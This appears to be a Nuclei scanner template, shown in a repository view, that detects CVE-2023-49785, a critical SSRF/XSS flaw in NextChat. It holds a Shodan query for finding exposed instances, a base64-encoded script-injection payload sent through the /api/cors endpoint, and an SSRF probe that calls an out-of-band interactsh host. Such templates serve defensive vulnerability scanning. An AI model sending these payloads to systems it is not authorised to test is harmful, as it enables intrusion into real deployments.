nuclei-templates/http/cves/2023/CVE-2023-49785.yaml

46 lines
1.5 KiB
YAML
Raw Normal View History

2024-03-11 14:38:40 +00:00
id: CVE-2023-49785
info:
name: ChatGPT-Next-Web - SSRF/XSS
2024-03-12 05:26:29 +00:00
author: high
2024-03-11 14:38:40 +00:00
severity: critical
description: |
Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
remediation: |
Do not expose to the Internet
reference:
- https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
2024-03-11 15:34:33 +00:00
- https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
2024-03-11 14:38:40 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2023-49785
cwe-id: CWE-79
epss-score: 0.00049
epss-percentile: 0.1584
2024-03-11 14:38:40 +00:00
metadata:
verified: true
max-request: 2
shodan-query: "title:NextChat,\"ChatGPT Next Web\""
2024-03-11 14:38:40 +00:00
tags: cve,cve2023,ssrf,xss,chatgpt,nextchat
http:
- method: GET
path:
- "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
- "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"
matchers-condition: or
matchers:
- type: dsl
dsl:
- contains(body_1, "<script>alert(document.domain)</script>")
- contains(header_1, "text/html")
condition: and
- type: dsl
dsl:
- contains(header_2,'X-Interactsh-Version')
- contains(interactsh_protocol_2,'dns')
condition: and
# digest: 4a0a004730450220044ba08dbbf92281a704e216fb48e6c232f709b05709515bc4ad70388bea4317022100a9e4de43629f0f51e429598a924f63d6133561711039b0e3b7ca1cdeb64e7895:922c64590222798bb761d5b6d8e72950